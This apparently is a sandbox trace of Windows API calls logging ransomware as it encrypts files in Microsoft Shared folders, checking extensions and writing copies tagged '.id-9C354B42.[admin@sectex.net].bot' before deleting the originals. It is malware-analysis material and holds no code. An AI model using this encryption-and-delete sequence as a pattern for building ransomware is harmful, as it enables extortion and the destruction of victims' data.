	[0051.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.418] lstrlenW (lpString=".zip") returned 4
	[0051.418] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString=".rar") returned 4
	[0051.418] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.418] lstrlenW (lpString=".bz2") returned 4
	[0051.418] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.418] lstrlenW (lpString=".7z") returned 3
	[0051.419] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.419] lstrlenW (lpString=".dbf") returned 4
	[0051.419] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.419] lstrlenW (lpString=".1cd") returned 4
	[0051.419] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 66
	[0051.422] lstrlenW (lpString=".jpg") returned 4
	[0051.423] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.423] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0051.426] lstrlenW (lpString="odffilt.dll") returned 11
	[0051.436] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.438] GetFileSizeEx (in: hFile=0x184, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1312656) returned 1
	[0051.438] CloseHandle (hObject=0x184) returned 1
	[0051.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 0x20
	[0051.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0051.438] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.438] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.439] GetLastError () returned 0x0
	[0051.439] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0xffff0, lpOverlapped=0x0) returned 1
	[0051.460] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xffff0, lpOverlapped=0x0) returned 1
	[0051.723] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x407a0, lpOverlapped=0x0) returned 1
	[0051.741] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x407b0, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x407b0, lpOverlapped=0x0) returned 1
	[0051.748] ReadFile (in: hFile=0x184, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.748] WriteFile (in: hFile=0x1a8, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0051.748] SetEndOfFile (hFile=0x1a8) returned 1
	[0051.748] CloseHandle (hObject=0x1a8) returned 1
	[0051.748] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.748] SetEndOfFile (hFile=0x184) returned 1
	[0051.751] CloseHandle (hObject=0x184) returned 1
	[0051.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.751] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll")) returned 1
	[0051.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.879] lstrlenW (lpString=".doc") returned 4
	[0051.879] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".docx") returned 5
	[0051.880] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0051.880] lstrlenW (lpString=".pdf") returned 4
	[0051.880] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".xls") returned 4
	[0051.880] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".xlsx") returned 5
	[0051.880] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0051.880] lstrlenW (lpString=".ppt") returned 4
	[0051.880] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString=".zip") returned 4
	[0051.880] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".rar") returned 4
	[0051.880] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".bz2") returned 4
	[0051.880] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.880] lstrlenW (lpString=".7z") returned 3
	[0051.880] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString=".dbf") returned 4
	[0051.880] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString=".1cd") returned 4
	[0051.880] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString=".jpg") returned 4
	[0051.880] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.880] lstrlenW (lpString=".doc") returned 4
	[0051.880] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0051.880] lstrlenW (lpString=".docx") returned 5
	[0051.880] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1
	[0051.880] lstrlenW (lpString=".pdf") returned 4
	[0051.881] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0051.881] lstrlenW (lpString=".xls") returned 4
	[0051.881] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0051.881] lstrlenW (lpString=".xlsx") returned 5
	[0051.881] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1
	[0051.881] lstrlenW (lpString=".ppt") returned 4
	[0051.881] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0051.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.881] lstrlenW (lpString=".zip") returned 4
	[0051.881] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0051.881] lstrlenW (lpString=".rar") returned 4
	[0051.881] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0051.881] lstrlenW (lpString=".bz2") returned 4
	[0051.881] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0051.881] lstrlenW (lpString=".7z") returned 3
	[0051.881] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0051.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.881] lstrlenW (lpString=".dbf") returned 4
	[0051.881] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0051.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.881] lstrlenW (lpString=".1cd") returned 4
	[0051.881] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0051.881] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 66
	[0051.881] lstrlenW (lpString=".jpg") returned 4
	[0051.881] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0051.881] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0051.881] lstrlenW (lpString="VISFILT.DLL") returned 11
	[0051.881] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0051.884] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=2124664) returned 1
	[0051.884] CloseHandle (hObject=0x1d0) returned 1
	[0051.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll")) returned 0x20
	[0051.884] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.884] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0051.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0051.885] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0x0) returned 1
	[0051.885] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0051.885] ReadFile (in: hFile=0x1d0, lpBuffer=0xb0b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0b0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0051.889] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0051.889] ReadFile (in: hFile=0x1d0, lpBuffer=0xb0f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb0f0058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0051.893] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa55fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0051.893] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc2c | out: lpNewFilePointer=0x0) returned 1
	[0051.893] ReadFile (in: hFile=0x1d0, lpBuffer=0xb130058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa55fc38, lpOverlapped=0x0 | out: lpBuffer=0xb130058*, lpNumberOfBytesRead=0xa55fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0051.915] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.915] WriteFile (in: hFile=0x1d0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa55fcb0, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0052.197] SetEndOfFile (hFile=0x1d0) returned 1
	[0052.197] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0052.201] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0052.201] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0052.202] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xace7d, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0052.202] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0052.204] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1c6b78, lpNewFilePointer=0x0, dwMoveMethod=0xa55fc7c | out: lpNewFilePointer=0x0) returned 1
	[0052.204] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa55fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa55fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0052.206] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0052.206] CloseHandle (hObject=0x1d0) returned 1
	[0052.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.206] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.206] lstrlenW (lpString=".doc") returned 4
	[0052.206] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0052.206] lstrlenW (lpString=".docx") returned 5
	[0052.206] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0052.206] lstrlenW (lpString=".pdf") returned 4
	[0052.206] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0052.206] lstrlenW (lpString=".xls") returned 4
	[0052.206] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0052.206] lstrlenW (lpString=".xlsx") returned 5
	[0052.206] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0052.206] lstrlenW (lpString=".ppt") returned 4
	[0052.207] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString=".zip") returned 4
	[0052.207] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString=".rar") returned 4
	[0052.207] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString=".bz2") returned 4
	[0052.207] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0052.207] lstrlenW (lpString=".7z") returned 3
	[0052.207] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString=".dbf") returned 4
	[0052.207] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString=".1cd") returned 4
	[0052.207] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString=".jpg") returned 4
	[0052.207] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.207] lstrlenW (lpString=".doc") returned 4
	[0052.207] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString=".docx") returned 5
	[0052.207] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0052.207] lstrlenW (lpString=".pdf") returned 4
	[0052.207] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString=".xls") returned 4
	[0052.207] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString=".xlsx") returned 5
	[0052.207] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0052.207] lstrlenW (lpString=".ppt") returned 4
	[0052.207] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0052.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.208] lstrlenW (lpString=".zip") returned 4
	[0052.208] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0052.208] lstrlenW (lpString=".rar") returned 4
	[0052.208] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0052.208] lstrlenW (lpString=".bz2") returned 4
	[0052.208] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0052.208] lstrlenW (lpString=".7z") returned 3
	[0052.208] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.208] lstrlenW (lpString=".dbf") returned 4
	[0052.208] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.208] lstrlenW (lpString=".1cd") returned 4
	[0052.208] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0052.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 66
	[0052.208] lstrlenW (lpString=".jpg") returned 4
	[0052.208] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0052.208] lstrcmpiW (lpString1=".FNT", lpString2=".bot") returned 1
	[0052.208] lstrlenW (lpString="CGMIMP32.FNT") returned 12
	[0052.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0053.721] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=606062) returned 1
	[0053.721] CloseHandle (hObject=0x23c) returned 1
	[0053.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20
	[0053.839] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.839] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.877] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.877] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.895] GetLastError () returned 0x0
	[0053.895] ReadFile (in: hFile=0x22c, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x93f6e, lpOverlapped=0x0) returned 1
	[0053.907] WriteFile (in: hFile=0x170, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x93f70, lpOverlapped=0x0) returned 1
	[0053.916] ReadFile (in: hFile=0x22c, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.916] WriteFile (in: hFile=0x170, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.916] SetEndOfFile (hFile=0x170) returned 1
	[0053.916] CloseHandle (hObject=0x170) returned 1
	[0053.917] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.917] SetEndOfFile (hFile=0x22c) returned 1
	[0053.922] CloseHandle (hObject=0x22c) returned 1
	[0053.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.922] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1
	[0053.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.922] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.922] lstrlenW (lpString=".doc") returned 4
	[0053.922] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1
	[0053.922] lstrlenW (lpString=".docx") returned 5
	[0053.922] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1
	[0053.922] lstrlenW (lpString=".pdf") returned 4
	[0053.922] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".xls") returned 4
	[0053.923] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".xlsx") returned 5
	[0053.923] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1
	[0053.923] lstrlenW (lpString=".ppt") returned 4
	[0053.923] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67
	[0053.923] lstrlenW (lpString=".zip") returned 4
	[0053.923] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".rar") returned 4
	[0053.923] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1
	[0053.923] lstrlenW (lpString=".bz2") returned 4
	[0053.923] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1
	[0053.923] lstrlenW (lpString=".7z") returned 3
